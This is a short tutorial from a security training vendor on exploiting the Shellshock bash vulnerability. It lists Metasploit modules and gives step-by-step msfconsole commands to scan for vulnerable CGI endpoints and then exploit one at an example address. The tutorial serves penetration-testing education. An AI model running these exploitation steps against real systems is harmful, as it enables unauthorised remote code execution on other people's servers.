
Trojan Horse Security offers official testing and certification as a Certified Cyber Hacker (CCH).


SHELLSHOCK

TROJAN HORSE SECURITY IS TEACHING THESE CONCEPTS FOR EDUCATIONAL PURPOSES ONLY. WE DO NOT CONDONE ILLEGAL HACKING. TROJAN HORSE SECURITY CONSULTANTS ARE HIRED AS ETHICAL HACKERS AT THE REQUEST OF ORGANIZATIONS WITH PERMISSION TO HACK THEIR NETWORKS AND SYSTEMS.

 

 

Shellshock was another one of those exploits that was very impactful across the IT industry. Some said it was Heartbleed 2.0.

 

There are already many Metasploit modules available for Shellshock, including:

> auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
> auxiliary/server/dhclient_bash_env.rb
> exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
> exploits/osx/local/vmware_bash_function_root.rb

 

 

Let's try one. Start by launching Metasploit. Remember to start the database service!

# service postgresql start

/opt/metasploit/app# ./msfconsole

 

Once launched, use the following commands to scan for vulnerable systems:

 

msf > use auxiliary/scanner/http/apache_mod_cgi_bash_env

msf auxiliary(apache_mod_cgi_bash_env) > set RHOSTS <TARGETS>

RHOSTS=> <TARGETS>

msf auxiliary(apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/printenv.cgi
TARGETURI=> /cgi-bin/printenv.cgi

msf auxiliary(apache_mod_cgi_bash_env) > run

 

Once a vulnerable system is discovered, it can be exploited using the following module:

 

msf > use exploits/multi/http/apache_mod_cgi_bash_env_exec

msf exploit(apache_mod_cgi_bash_env_exec) > set RHOST 192.168.1.1
RHOST=> 192.168.1.1

msf exploit(apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/printenv.cgi
TARGETURI=> /cgi-bin/printenv.cgi

msf exploit(apache_mod_cgi_bash_env_exec) > run

 

There are many ways to exploit this vulnerability. Try out a few different ways and see for yourself why it is so dangerous.